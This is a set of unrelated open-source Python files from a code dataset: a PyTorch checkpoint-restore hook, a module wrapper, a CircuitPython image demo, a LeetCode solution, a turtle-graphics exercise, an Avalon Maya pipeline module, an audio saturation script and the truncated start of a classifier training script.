filename | text
---|---
the-stack_106_14737
|
import torch, os
from edflow.hooks.hook import Hook
from edflow.custom_logging import get_logger
from edflow.hooks.checkpoint_hooks.common import get_latest_checkpoint
class RestorePytorchModelHook(Hook):
"""Restores a PyTorch model from a checkpoint at each epoch. Can also be
used as a functor."""
def __init__(
self,
model,
checkpoint_path,
filter_cond=lambda c: True,
global_step_setter=None,
):
"""
Parameters
----------
model : torch.nn.Module
Model to initialize
checkpoint_path : str
Directory in which the checkpoints are
stored or explicit checkpoint. Ignored if used as functor.
filter_cond : Callable
A function used to filter files, to only get the checkpoints that
are wanted. Ignored if used as functor.
global_step_setter : Callable
            Function that the retrieved global step can be passed to.
"""
self.root = checkpoint_path
self.fcond = filter_cond
self.logger = get_logger(self)
self.model = model
self.global_step_setter = global_step_setter
def before_epoch(self, ep):
checkpoint = get_latest_checkpoint(self.root, self.fcond)
self(checkpoint)
def __call__(self, checkpoint):
self.model.load_state_dict(torch.load(checkpoint))
self.logger.info("Restored model from {}".format(checkpoint))
epoch, step = self.parse_checkpoint(checkpoint)
if self.global_step_setter is not None:
self.global_step_setter(step)
self.logger.info("Epoch: {}, Global step: {}".format(epoch, step))
@staticmethod
def parse_global_step(checkpoint):
return RestorePytorchModelHook.parse_checkpoint(checkpoint)[1]
@staticmethod
def parse_checkpoint(checkpoint):
e_s = os.path.basename(checkpoint).split(".")[0].split("-")
if len(e_s) > 1:
epoch = e_s[0]
step = e_s[1].split("_")[0]
else:
epoch = 0
step = e_s[0].split("_")[0]
return int(epoch), int(step)
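# --- Hedged usage sketch (not part of the original module) -------------------
# Shows the hook used as a functor on an explicit checkpoint path. The toy
# Linear model, the temporary directory and the "<epoch>-<step>_model.ckpt"
# file name are assumptions chosen to match what parse_checkpoint() expects.
def _demo_restore_hook():
    import tempfile
    model = torch.nn.Linear(4, 2)
    with tempfile.TemporaryDirectory() as tmpdir:
        ckpt = os.path.join(tmpdir, "3-1500_model.ckpt")
        torch.save(model.state_dict(), ckpt)  # pretend this is epoch 3, step 1500
        hook = RestorePytorchModelHook(model, tmpdir)
        hook(ckpt)  # functor usage: restores the weights from the given file
        return RestorePytorchModelHook.parse_checkpoint(ckpt)  # -> (3, 1500)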
|
the-stack_106_14738
|
import importlib
from .parameter import Parameter
from deconvtest.core.utils.utils import list_modules, is_valid_type
from deconvtest.core.utils.errors import raise_not_valid_method_error, raise_not_valid_type_error
class Module:
"""
Abstract module class
"""
def __init__(self, method: str = None, parameters: dict = None, parent_name: str = 'deconvtest.methods'):
if parameters is None:
self.parameter_values = dict()
else:
self.parameter_values = parameters
self.parent_name = parent_name
self.method = None
self.arg_spec = None
self.parameters = []
self.result = None
self.n_inputs = None
self.n_outputs = None
self.inputs = None
self.align = False
self.type_input = None
self.type_output = None
if method is not None:
self.import_method(method)
if self.arg_spec is not None:
self.add_parameters(self.arg_spec)
def list_available_methods(self):
parent_module = importlib.import_module(self.parent_name)
available_methods = list_modules(parent_module)
return available_methods
def list_available_methods_names(self):
available_methods = self.list_available_methods()
return [method[0].__name__ for method in available_methods]
def import_method(self, method):
available_methods = self.list_available_methods()
for av_method in available_methods: # find a module with a matching name
if av_method[0].__name__ == method:
self.method = av_method[0]
self.arg_spec = av_method[1]
if self.method is None: # raise an error if no matching module found
available_methods = self.list_available_methods_names()
raise_not_valid_method_error(method, self.parent_name, available_methods)
def add_parameters(self, arg_spec):
names = arg_spec.args
defaults = arg_spec.defaults
if defaults is None:
defaults = []
types = arg_spec.annotations
n_non_optional_parameters = len(names) - len(defaults)
self.parameters = []
for i in range(len(names)):
if i < n_non_optional_parameters:
optional = False
default = None
else:
optional = True
default = defaults[i - n_non_optional_parameters]
parameter_type = None
if names[i] in types.keys():
parameter_type = types[names[i]]
self.parameters.append(Parameter(name=names[i],
default_value=default,
optional=optional,
parameter_type=parameter_type))
def verify_parameters(self):
missing_param = 0
for parameter in self.parameters:
if parameter.name in self.parameter_values.keys():
if not is_valid_type(self.parameter_values[parameter.name], parameter.type):
raise_not_valid_type_error(type(self.parameter_values[parameter.name]),
parameter.name, parameter.type)
else:
# add default value if available, otherwise raise error
if parameter.optional is True:
self.parameter_values[parameter.name] = parameter.default_value
elif self.inputs is not None and len(self.inputs) > 0:
missing_param += 1
else:
raise ValueError(rf'Parameter `{parameter.name}` is mandatory, please provide a value!')
if missing_param > 0 and missing_param != len(self.inputs):
raise ValueError(rf'Number of inputs to {self.method} must be {missing_param}, '
rf'{len(self.inputs)} provided.')
def run(self, *inputs, **parameters):
self.parameter_values = parameters
self.inputs = inputs
self.verify_parameters()
self.result = self.method(*self.inputs, **self.parameter_values)
return self.result
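# --- Hedged sketch (not part of the original module) -------------------------
# Illustrates the mandatory/optional split that add_parameters() applies to an
# arg spec: arguments without defaults are mandatory, the trailing
# len(defaults) arguments are optional. The toy `blur` function below is an
# assumption used only for illustration.
def _demo_argspec_split():
    import inspect

    def blur(image, sigma: float = 1.0, mode: str = 'reflect'):
        return image

    spec = inspect.getfullargspec(blur)
    n_mandatory = len(spec.args) - len(spec.defaults or ())
    mandatory = spec.args[:n_mandatory]                                # ['image']
    optional = dict(zip(spec.args[n_mandatory:], spec.defaults or ()))
    return mandatory, optional         # (['image'], {'sigma': 1.0, 'mode': 'reflect'})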
|
the-stack_106_14739
|
from adafruit_clue import clue
import displayio
import vectorio
import adafruit_imageload
import gc
import time
display = clue.display
#
# loading two images into memory
#
bmp, palette = adafruit_imageload.load("doge_4bit.bmp")
tg = displayio.TileGrid(bmp, pixel_shader = palette)
gp = displayio.Group()
gp.append(tg)
bmp_flipped, palette_flipped = adafruit_imageload.load("doge_4bit_flipped.bmp")
tg_flipped = displayio.TileGrid(bmp_flipped, pixel_shader = palette_flipped)
gp_flipped = displayio.Group()
gp_flipped.append(tg_flipped)
while True:
display.show(gp)
display.refresh(target_frames_per_second = 30)
display.show(gp_flipped)
display.refresh(target_frames_per_second = 30)
#
# trying to load from memory, but no space!
#
bmp, palette = adafruit_imageload.load("doge_8bit.bmp")
tg = displayio.TileGrid(bmp, pixel_shader = palette)
gp = displayio.Group()
gp.append(tg)
bmp_flipped, palette_flipped = adafruit_imageload.load("doge_8bit_flipped.bmp")
tg_flipped = displayio.TileGrid(bmp_flipped, pixel_shader = palette_flipped)
gp_flipped = displayio.Group()
gp_flipped.append(tg_flipped)
while True:
display.show(gp)
display.refresh()
display.show(gp_flipped)
display.refresh()
#
# loading from disk, viewing the long load times
#
f = open('doge_24bit.bmp', 'rb')
bmp = displayio.OnDiskBitmap(f)
tg = displayio.TileGrid(bmp, pixel_shader = displayio.ColorConverter())
gp = displayio.Group()
gp.append(tg)
g = open('doge_24bit_flipped.bmp', 'rb')
bmp_flip = displayio.OnDiskBitmap(g)
tg_flip = displayio.TileGrid(bmp_flip, pixel_shader = displayio.ColorConverter())
gp_flip = displayio.Group()
gp_flip.append(tg_flip)
display.show(gp_flip)
while True:
display.show(gp)
display.refresh()
display.show(gp_flip)
display.refresh()
#
# code not talked about in the guide, but I started trying to read the headers from the bitmap files! No thanks!
#
bmp = displayio.Bitmap(240, 240, 256)
with open('doge_16.bmp', 'rb') as f:
data = f.read()
header_field = data[:2]
print(header_field.decode('utf-8'))
filesize = data[2:6]
print("FILESIZE:", int.from_bytes(filesize, "little"))
pixel_loc = data[10:14]
print("DATA START:", int.from_bytes(pixel_loc, "little"))
header_size = data[14:18]
print("HEADER SIZE:",int.from_bytes(header_size, "little"))
if header_field.decode('utf-8') == 'BM':
width = data[18:22]
print("WIDTH:", int.from_bytes(width, "little"))
        height = data[22:26]
print("HEIGHT:", int.from_bytes(height, "little"))
while True:
pass
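#
# hedged helper sketch (not in the original guide code): the same BMP header
# fields read above, packaged into a dict; offsets follow the standard
# little-endian BMP file header / BITMAPINFOHEADER layout
#
def parse_bmp_header(data):
    return {
        "signature": data[0:2].decode('utf-8'),             # should be 'BM'
        "file_size": int.from_bytes(data[2:6], "little"),
        "pixel_data_offset": int.from_bytes(data[10:14], "little"),
        "dib_header_size": int.from_bytes(data[14:18], "little"),
        "width": int.from_bytes(data[18:22], "little"),
        "height": int.from_bytes(data[22:26], "little"),    # top-down BMPs store a negative height (not handled here)
    }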
#
# create a bitmap by loading into memory
#
bmp = displayio.Bitmap(120, 120, 2)
palette = displayio.Palette(2)
palette[0] = (255,0,0)
palette[1] = (255,255,255)
for i in range(120):
for j in range(120):
if (i + j) % 8 in [0,1,2,4]:
bmp[i,j] = 1
else:
bmp[i,j] = 0
tg = displayio.TileGrid(bitmap = bmp, pixel_shader = palette)
gp = displayio.Group(x = 60, y = 60)
gp.append(tg)
display.show(gp)
while True:
pass
|
the-stack_106_14741
|
import unittest
from typing import List
import utils
# O(m*n) time. O(m*n) space. DFS with memoization over an m-by-n matrix.
class Solution:
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix or not matrix[0]:
return 0
height = len(matrix)
width = len(matrix[0])
max_lengths = [[0] * width for _ in range(height)]
def dfs(row, col):
max_length = max_lengths[row][col]
if max_length:
return max_length
curr = matrix[row][col]
max_length = 0
if row > 0 and matrix[row - 1][col] > curr:
max_length = max(max_length, dfs(row - 1, col))
if row + 1 < height and matrix[row + 1][col] > curr:
max_length = max(max_length, dfs(row + 1, col))
if col > 0 and matrix[row][col - 1] > curr:
max_length = max(max_length, dfs(row, col - 1))
if col + 1 < width and matrix[row][col + 1] > curr:
max_length = max(max_length, dfs(row, col + 1))
max_length += 1
max_lengths[row][col] = max_length
return max_length
return max(dfs(row, col) for row in range(height) for col in range(width))
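# Hedged worked example (the standard LeetCode 329 sample input):
#   Solution().longestIncreasingPath([[9, 9, 4],
#                                     [6, 6, 8],
#                                     [2, 1, 1]]) == 4   # path 1 -> 2 -> 6 -> 9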
class Test(unittest.TestCase):
def test(self):
utils.test(self, __file__, Solution)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_14744
|
"""
Demonstrates using OBJECTS via Turtle Graphics.
Concepts include:
-- CONSTRUCT an INSTANCE of a CLASS (we call such instances OBJECTS).
-- Make an object ** DO ** something by using a METHOD.
-- Reference an object's ** DATA ** by using an INSTANCE VARIABLE.
Also:
-- ASSIGNING a VALUE to a NAME (VARIABLE).
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Aaron Wilkin, their colleagues, and Chen Li.
"""
###############################################################################
#
# DONE: 1.
# Yes, that means for YOU to DO things per the following instructions:
#
# On Line 13 above, replace PUT_YOUR_NAME_HERE with your OWN name.
#
# BTW, the top block of text above forms what is called a DOC-STRING.
# It documents what this module does, in a way that exterior programs
# can make sense of. It has no other effect on this program.
#
###############################################################################
import rosegraphics as rg
###############################################################################
#
# DONE: 2.
# Allow this module to use the rosegraphics.py module by marking the
# src
# folder in this project as a "Sources Root", as follows:
#
# In the Project window (to the left), right click on the src folder,
# then select Mark Directory As ~ Sources Root.
#
# You will see that rosegraphics in the import statement above (line 28)
# is no longer marked as an error. You will do this in all projects
# that use rosegraphics, so get used to it. :)
#
# Once rosegraphics in the import statement is no longer marked as error,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
###############################################################################
#
# DONE: 3.
# Run this module. A window will pop up and Turtles will move around.
# After the Turtles stop moving,
# ** click anywhere in the window to close the window **.
#
# Then look at the code below. Raise your hand when you have questions about
# what the code is doing. Be sure that you understand the notations for:
#
# -- CONSTRUCTING an instance of a CLASS, e.g.
# rg.SimpleTurtle()
#
# -- ASSIGNING the resulting OBJECT (instance of a class) a NAME, e.g.
# natasha = rg.SimpleTurtle()
#
# -- Applying a METHOD to an object to make the object DO something, e.g.
# natasha.forward(100)
#
# -- Accessing an INSTANCE VARIABLE of an object, e.g.
# natasha.speed = 10
# boris.speed = natasha.speed
#
# After you are confident that you understand all the code below,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make and initialize) a TurtleWindow object for animation.
# The definition of a TurtleWindow is in the rg
# (shorthand for rosegraphics) module.
# -----------------------------------------------------------------------------
window = rg.TurtleWindow()
window.delay(20) # Bigger numbers mean slower animation.
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make) a SimpleTurtle object and ASSIGN a NAME to the object.
# -----------------------------------------------------------------------------
boris = rg.SimpleTurtle()
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Ask the SimpleTurtle object to do things by applying METHODs to it.
# The numbers in the parentheses are called ARGUMENTS.
# -----------------------------------------------------------------------------
boris.forward(100)
boris.left(90)
boris.forward(200)
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Construct a second SimpleTurtle,
# set its pen and speed INSTANCE VARIABLES, and ask it to do things.
# -----------------------------------------------------------------------------
natasha = rg.SimpleTurtle('turtle')
natasha.pen = rg.Pen('red', 30) # Second argument is the Pen's thickness
natasha.speed = 5 # Bigger means faster, max is usually about 10
natasha.backward(50)
natasha.right(90)
natasha.forward(125)
natasha.speed = 1 # Now slower
natasha.go_to(rg.Point(-100, 200))
###############################################################################
#
# DONE: 4.
# Add a few more lines of your own code to make one of the existing
# SimpleTurtles move some more and/or have different characteristics.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
natasha.draw_square(50)
natasha.speed = 3000
###############################################################################
#
# DONE: 5.
# The above code CONSTRUCTS two SimpleTurtle objects
# and gives those objects NAMES:
# boris natasha
#
# Add code of your own that constructs another SimpleTurtle object,
# naming it whatever you want. Names cannot have spaces or special
# characters, but they can have digits and underscores, e.g.
# this_1_has
#
# STYLE RULE: Your names should always begin with a LOWER_CASE letter.
# So mary is OK but Mary is NOT OK.
#
# Then add more code that:
# -- Constructs a Pen object,
# -- assigns your SimpleTurtle's pen to the constructed Pen object, and
# -- makes your SimpleTurtle move around a bit.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
ezrie = rg.SimpleTurtle('turtle')
ezrie.pen = rg.Pen('black', 100)
ezrie.forward(50)
###############################################################################
#
# DONE: 6.
# Ensure that no blue bars on the scrollbar-thing to the right remain.
# Run one more time to be sure that all is still OK.
#
# Then COMMIT-and-PUSH your work as before:
# 1. Select VCS from the menu bar (above).
# 2. Choose Commit from the pull-down menu that appears.
# 3. In the Commit Changes window that pops up,
# press the Commit and Push button.
# (Note: If you see only a Commit button:
# - HOVER over the Commit button
# (in the lower-right corner of the window)
# - CLICK on Commit and Push.)
#
# You can COMMIT-and-PUSH as often as you like.
# DO IT FREQUENTLY; AT LEAST once per module.
#
###############################################################################
# -----------------------------------------------------------------------------
# The next line keeps the window open until the user clicks in the window.
# Throughout this exercise, this close_on_mouse_click line
# should be the LAST line in the file. DO NOT ADD CODE BELOW THIS LINE!
# -----------------------------------------------------------------------------
window.close_on_mouse_click()
|
the-stack_106_14745
|
import os
import sys
import errno
import importlib
import contextlib
from maya import cmds, OpenMaya
import maya.utils
import maya.api.OpenMaya as om
from pyblish import api as pyblish
from . import lib, compat
from ..lib import logger, find_submodule
from .. import api
from ..tools import workfiles
from ..vendor.Qt import QtCore, QtWidgets
from ..pipeline import AVALON_CONTAINER_ID
# Backwards compatibility
load = compat.load
update = compat.update
remove = compat.remove
create = compat.create
self = sys.modules[__name__]
self._menu = "avalonmaya" # Unique name of menu
self._events = dict() # Registered Maya callbacks
self._parent = None # Main Window
self._ignore_lock = False
AVALON_CONTAINERS = ":AVALON_CONTAINERS"
IS_HEADLESS = not hasattr(cmds, "about") or cmds.about(batch=True)
def install():
"""Install Maya-specific functionality of avalon-core.
This function is called automatically on calling `api.install(maya)`.
"""
# Inherit globally set name
self._menu = api.Session["AVALON_LABEL"] + "menu"
_register_callbacks()
_register_events()
_set_project()
# Check if maya version is compatible else fix it, Maya2018 only
# Should be run regardless of batch mode
compat.install()
if not IS_HEADLESS:
_install_menu()
pyblish.register_host("mayabatch")
pyblish.register_host("mayapy")
pyblish.register_host("maya")
def _set_project():
"""Sets the maya project to the current Session's work directory.
Returns:
None
"""
workdir = api.Session["AVALON_WORKDIR"]
try:
os.makedirs(workdir)
except OSError as e:
# An already existing working directory is fine.
if e.errno == errno.EEXIST:
pass
else:
raise
cmds.workspace(workdir, openWorkspace=True)
def get_main_window():
"""Acquire Maya's main window"""
if self._parent is None:
self._parent = {
widget.objectName(): widget
for widget in QtWidgets.QApplication.topLevelWidgets()
}["MayaWindow"]
return self._parent
def uninstall():
"""Uninstall Maya-specific functionality of avalon-core.
This function is called automatically on calling `api.uninstall()`.
"""
_uninstall_menu()
pyblish.deregister_host("mayabatch")
pyblish.deregister_host("mayapy")
pyblish.deregister_host("maya")
def _install_menu():
from ..tools import (
projectmanager,
creator,
loader,
publish,
sceneinventory
)
from . import interactive
_uninstall_menu()
def deferred():
cmds.menu(self._menu,
label=api.Session["AVALON_LABEL"],
tearOff=True,
parent="MayaWindow")
# Create context menu
context_label = "{}, {}".format(
api.Session["AVALON_ASSET"],
api.Session["AVALON_TASK"]
)
cmds.menuItem(
"currentContext",
label=context_label,
parent=self._menu,
enable=False
)
cmds.setParent("..", menu=True)
cmds.menuItem(divider=True)
# Create default items
cmds.menuItem("Create...",
command=lambda *args: creator.show(parent=self._parent))
cmds.menuItem("Load...",
command=lambda *args: loader.show(parent=self._parent,
use_context=True))
cmds.menuItem("Publish...",
command=lambda *args: publish.show(parent=self._parent),
image=publish.ICON)
cmds.menuItem("Manage...",
command=lambda *args: sceneinventory.show(
parent=self._parent))
cmds.menuItem(divider=True)
cmds.menuItem("Work Files", command=launch_workfiles_app)
system = cmds.menuItem("System",
label="System",
tearOff=True,
subMenu=True,
parent=self._menu)
cmds.menuItem("Project Manager",
command=lambda *args: projectmanager.show(
parent=self._parent))
cmds.menuItem("Reinstall Avalon",
label="Reinstall Avalon",
subMenu=True,
parent=system)
cmds.menuItem("Confirm", command=reload_pipeline)
cmds.setParent(self._menu, menu=True)
cmds.menuItem("Reset Frame Range",
command=interactive.reset_frame_range)
cmds.menuItem("Reset Resolution",
command=interactive.reset_resolution)
# Allow time for uninstallation to finish.
# We use Maya's executeDeferred instead of QTimer.singleShot
# so that it only gets called after Maya UI has initialized too.
# This is crucial with Maya 2020+ which initializes without UI
# first as a QCoreApplication
maya.utils.executeDeferred(deferred)
def launch_workfiles_app(*args):
workfiles.show(
os.path.join(
cmds.workspace(query=True, rootDirectory=True),
cmds.workspace(fileRuleEntry="scene")
),
parent=self._parent
)
def reload_pipeline(*args):
"""Attempt to reload pipeline at run-time.
CAUTION: This is primarily for development and debugging purposes.
"""
api.uninstall()
for module in ("avalon.io",
"avalon.lib",
"avalon.pipeline",
"avalon.maya.commands",
"avalon.maya.interactive",
"avalon.maya.pipeline",
"avalon.maya.lib",
"avalon.tools.creator.app",
                   # NOTE(marcus): These have circular dependencies
# that is preventing reloadability
# "avalon.tools.loader.delegates",
# "avalon.tools.loader.model",
# "avalon.tools.loader.widgets",
# "avalon.tools.loader.app",
# "avalon.tools.sceneinventory.model",
# "avalon.tools.sceneinventory.proxy",
# "avalon.tools.sceneinventory.app",
# "avalon.tools.projectmanager.dialogs",
# "avalon.tools.projectmanager.lib",
# "avalon.tools.projectmanager.model",
# "avalon.tools.projectmanager.style",
# "avalon.tools.projectmanager.widget",
# "avalon.tools.projectmanager.app",
"avalon.api",
"avalon.tools",
"avalon.maya"):
module = importlib.import_module(module)
reload(module)
get_main_window()
import avalon.maya
api.install(avalon.maya)
def _uninstall_menu():
# In Maya 2020+ don't use the QApplication.instance()
# during startup (userSetup.py) as it will return a
# QtCore.QCoreApplication instance which does not have
# the allWidgets method. As such, we call the staticmethod.
all_widgets = QtWidgets.QApplication.allWidgets()
widgets = dict((w.objectName(), w) for w in all_widgets)
menu = widgets.get(self._menu)
if menu:
menu.deleteLater()
del(menu)
def _update_menu_task_label():
"""Update the task label in Avalon menu to current session"""
if IS_HEADLESS:
return
object_name = "{}|currentContext".format(self._menu)
if not cmds.menuItem(object_name, query=True, exists=True):
logger.warning("Can't find menuItem: {}".format(object_name))
return
label = "{}, {}".format(api.Session["AVALON_ASSET"],
api.Session["AVALON_TASK"])
cmds.menuItem(object_name, edit=True, label=label)
def lock():
"""Lock scene
Add an invisible node to your Maya scene with the name of the
current file, indicating that this file is "locked" and cannot
be modified any further.
"""
if not cmds.objExists("lock"):
with lib.maintained_selection():
cmds.createNode("objectSet", name="lock")
cmds.addAttr("lock", ln="basename", dataType="string")
# Permanently hide from outliner
cmds.setAttr("lock.verticesOnlySet", True)
fname = cmds.file(query=True, sceneName=True)
basename = os.path.basename(fname)
cmds.setAttr("lock.basename", basename, type="string")
def unlock():
"""Permanently unlock a locked scene
Doesn't throw an error if scene is already unlocked.
"""
try:
cmds.delete("lock")
except ValueError:
pass
def is_locked():
"""Query whether current scene is locked"""
fname = cmds.file(query=True, sceneName=True)
basename = os.path.basename(fname)
if self._ignore_lock:
return False
try:
return cmds.getAttr("lock.basename") == basename
except ValueError:
return False
@contextlib.contextmanager
def lock_ignored():
"""Context manager for temporarily ignoring the lock of a scene
The purpose of this function is to enable locking a scene and
saving it with the lock still in place.
Example:
>>> with lock_ignored():
... pass # Do things without lock
"""
self._ignore_lock = True
try:
yield
finally:
self._ignore_lock = False
def containerise(name,
namespace,
nodes,
context,
loader=None,
suffix="CON"):
"""Bundle `nodes` into an assembly and imprint it with metadata
    Containerisation enables tracking of version, author and origin
    for loaded assets.
Arguments:
name (str): Name of resulting assembly
namespace (str): Namespace under which to host container
nodes (list): Long names of nodes to containerise
context (dict): Asset information
loader (str, optional): Name of loader used to produce this container.
suffix (str, optional): Suffix of container, defaults to `_CON`.
Returns:
container (str): Name of container assembly
"""
container = cmds.sets(nodes, name="%s_%s_%s" % (namespace, name, suffix))
data = [
("schema", "avalon-core:container-2.0"),
("id", AVALON_CONTAINER_ID),
("name", name),
("namespace", namespace),
("loader", str(loader)),
("representation", context["representation"]["_id"]),
]
for key, value in data:
if not value:
continue
if isinstance(value, (int, float)):
cmds.addAttr(container, longName=key, attributeType="short")
cmds.setAttr(container + "." + key, value)
else:
cmds.addAttr(container, longName=key, dataType="string")
cmds.setAttr(container + "." + key, value, type="string")
main_container = cmds.ls(AVALON_CONTAINERS, type="objectSet")
if not main_container:
main_container = cmds.sets(empty=True, name=AVALON_CONTAINERS)
# Implement #399: Maya 2019+ hide AVALON_CONTAINERS on creation..
if cmds.attributeQuery("hiddenInOutliner",
node=main_container,
exists=True):
cmds.setAttr(main_container + ".hiddenInOutliner", True)
else:
main_container = main_container[0]
cmds.sets(container, addElement=main_container)
# Implement #399: Maya 2019+ hide containers in outliner
if cmds.attributeQuery("hiddenInOutliner",
node=container,
exists=True):
cmds.setAttr(container + ".hiddenInOutliner", True)
return container
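# Hedged usage sketch for containerise() (the names and values below are
# illustrative assumptions, not part of the original module):
#
#   containerise(name="hero",
#                namespace="hero_01",
#                nodes=cmds.ls("hero_01:*", long=True),
#                context={"representation": {"_id": "..."}},
#                loader="ReferenceLoader")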
def parse_container(container):
"""Return the container node's full container data.
Args:
container (str): A container node name.
Returns:
dict: The container schema data for this container node.
"""
data = lib.read(container)
# Backwards compatibility pre-schemas for containers
data["schema"] = data.get("schema", "avalon-core:container-1.0")
# Append transient data
data["objectName"] = container
return data
def _ls():
"""Yields Avalon container node names.
Used by `ls()` to retrieve the nodes and then query the full container's
data.
Yields:
str: Avalon container node name (objectSet)
"""
def _maya_iterate(iterator):
"""Helper to iterate a maya iterator"""
while not iterator.isDone():
yield iterator.thisNode()
iterator.next()
ids = {AVALON_CONTAINER_ID,
# Backwards compatibility
"pyblish.mindbender.container"}
# Iterate over all 'set' nodes in the scene to detect whether
# they have the avalon container ".id" attribute.
fn_dep = om.MFnDependencyNode()
iterator = om.MItDependencyNodes(om.MFn.kSet)
for mobject in _maya_iterate(iterator):
if mobject.apiTypeStr != "kSet":
# Only match by exact type
continue
fn_dep.setObject(mobject)
if not fn_dep.hasAttribute("id"):
continue
plug = fn_dep.findPlug("id", True)
value = plug.asString()
if value in ids:
yield fn_dep.name()
def ls():
"""Yields containers from active Maya scene
This is the host-equivalent of api.ls(), but instead of listing
assets on disk, it lists assets already loaded in Maya; once loaded
they are called 'containers'
Yields:
dict: container
"""
container_names = _ls()
has_metadata_collector = False
config_host = find_submodule(api.registered_config(), "maya")
if hasattr(config_host, "collect_container_metadata"):
has_metadata_collector = True
for container in sorted(container_names):
data = parse_container(container)
# Collect custom data if attribute is present
if has_metadata_collector:
metadata = config_host.collect_container_metadata(container)
data.update(metadata)
yield data
def update_hierarchy(containers):
"""Hierarchical container support
    This is the function that supports Scene Inventory in drawing a
    hierarchical view of containers.
We need both parent and children to visualize the graph.
"""
container_names = set(_ls()) # lookup set
for container in containers:
# Find parent
parent = cmds.listSets(object=container["objectName"]) or []
for node in parent:
if node in container_names:
container["parent"] = node
break
# List children
children = cmds.ls(cmds.sets(container["objectName"], query=True),
type="objectSet")
container["children"] = [child for child in children
if child in container_names]
yield container
class Creator(api.Creator):
def process(self):
nodes = list()
with lib.undo_chunk():
if (self.options or {}).get("useSelection"):
nodes = cmds.ls(selection=True)
instance = cmds.sets(nodes, name=self.name)
lib.imprint(instance, self.data)
return instance
class Loader(api.Loader):
hosts = ["maya"]
def __init__(self, context):
super(Loader, self).__init__(context)
if self.fname:
self.fname = self.fname.replace(
api.registered_root(), "$AVALON_PROJECTS"
)
else:
logger.warning("Loader couldn't determine the filepath to load.")
def publish():
"""Shorthand to publish from within host"""
import pyblish.util
return pyblish.util.publish()
def _register_callbacks():
for handler, event in self._events.copy().items():
if event is None:
continue
try:
OpenMaya.MMessage.removeCallback(event)
self._events[handler] = None
except RuntimeError as e:
logger.info(e)
self._events[_on_scene_save] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kBeforeSave, _on_scene_save
)
self._events[_before_scene_save] = OpenMaya.MSceneMessage.addCheckCallback(
OpenMaya.MSceneMessage.kBeforeSaveCheck, _before_scene_save
)
self._events[_on_scene_new] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kAfterNew, _on_scene_new
)
self._events[_on_maya_initialized] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kMayaInitialized, _on_maya_initialized
)
self._events[_on_scene_open] = OpenMaya.MSceneMessage.addCallback(
OpenMaya.MSceneMessage.kAfterOpen, _on_scene_open
)
logger.info("Installed event handler _on_scene_save..")
logger.info("Installed event handler _before_scene_save..")
logger.info("Installed event handler _on_scene_new..")
logger.info("Installed event handler _on_maya_initialized..")
logger.info("Installed event handler _on_scene_open..")
def _register_events():
api.on("taskChanged", _on_task_changed)
logger.info("Installed event callback for 'taskChanged'..")
def _on_maya_initialized(*args):
api.emit("init", args)
if cmds.about(batch=True):
logger.warning("Running batch mode ...")
return
# Keep reference to the main Window, once a main window exists.
get_main_window()
def _on_scene_new(*args):
api.emit("new", args)
def _on_scene_save(*args):
api.emit("save", args)
def _on_scene_open(*args):
api.emit("open", args)
def _before_scene_save(return_code, client_data):
# Default to allowing the action. Registered
# callbacks can optionally set this to False
# in order to block the operation.
OpenMaya.MScriptUtil.setBool(return_code, True)
api.emit("before_save", [return_code, client_data])
def _on_task_changed(*args):
_update_menu_task_label()
workdir = api.Session["AVALON_WORKDIR"]
if os.path.exists(workdir):
logger.info("Updating Maya workspace for task change to %s", workdir)
_set_project()
# Set Maya fileDialog's start-dir to /scenes
frule_scene = cmds.workspace(fileRuleEntry="scene")
cmds.optionVar(stringValue=("browserLocationmayaBinaryscene",
workdir + "/" + frule_scene))
else:
logger.warning("Can't set project for new context because "
"path does not exist: %s", workdir)
|
the-stack_106_14746
|
import matplotlib.pyplot as plt
import numpy as np
import scipy.io.wavfile as wav
def cubicSaturation(out, gain):
    #Saturate the output signal using cubic soft clipping
out = out - out*out*out/3
return out
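#Hedged variant (not in the original code): the gain argument above is accepted
#but never used; one common choice is to apply it as a pre-gain before the
#cubic polynomial, for example:
def cubicSaturationWithGain(x, gain):
    #Scale the input, then apply the same cubic soft-clipping polynomial
    x = gain * x
    return x - x*x*x/3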
wav_fname = 'textbookcode/Ch_03/sw440hz.wav'
fs, data = wav.read(wav_fname)
length = data.shape[0] / fs
samplelength = data.shape[0]
print(f"length = {length}s")
# Divide audio signal by max int value for signed 16 bit number
data = data/np.iinfo(np.int16).max
#Set up the time axis for the waveform
time = np.linspace(0, length, data.shape[0])
#initialize output signal
data2 = np.zeros(samplelength)
#define the gain parameter (only use values from 0 to 1)
gain = 1
#Run the data through the cubic saturation function
for n in range(0,samplelength):
data2[n] = cubicSaturation(data[n], gain)
#set up the graph
fig = plt.figure(figsize=(10,4), dpi=100)
ax = fig.add_axes([0.1,0.1,0.8,0.8])
#plot the original waveform
ax.plot(time, data, label="Original Audio Signal")
#plot the synthesized sine waveform
ax.plot(time, data2, label="Saturated Signal")
ax.set_xlabel("Time [s]")
ax.set_ylabel("Amplitude")
ax.legend(loc= 7)
ax.set_xlim([0,0.02])
#Normalize the audio output level to max output
amplitude = np.iinfo(np.int16).max
data2 = data2*amplitude
#Truncate any non-integer/fractional data
#If we don't do this, the wav file won't be readable
data2 = np.asarray(data2, dtype = np.int16)
#Write the data to an output file
wav.write("textbookcode/Ch_03/sw440hz_modulated.wav", 44100, data2)
plt.show()
|
the-stack_106_14748
|
import model_wrapper as mw
from get_training_input_args import get_training_input_args
from img_classifier_utils import train,test
from time_elapsed import TimeElapsed
# Start Training
in_arg = get_training_input_args()
model = mw.ModelWrapper(in_arg.arch)
model.setup_data(in_arg.data_dir)
model.augment_normalize_data()
model.load_data()
model.freeze_params()
model.create_classifier(in_arg.hidden_units)
te = TimeElapsed('Training')
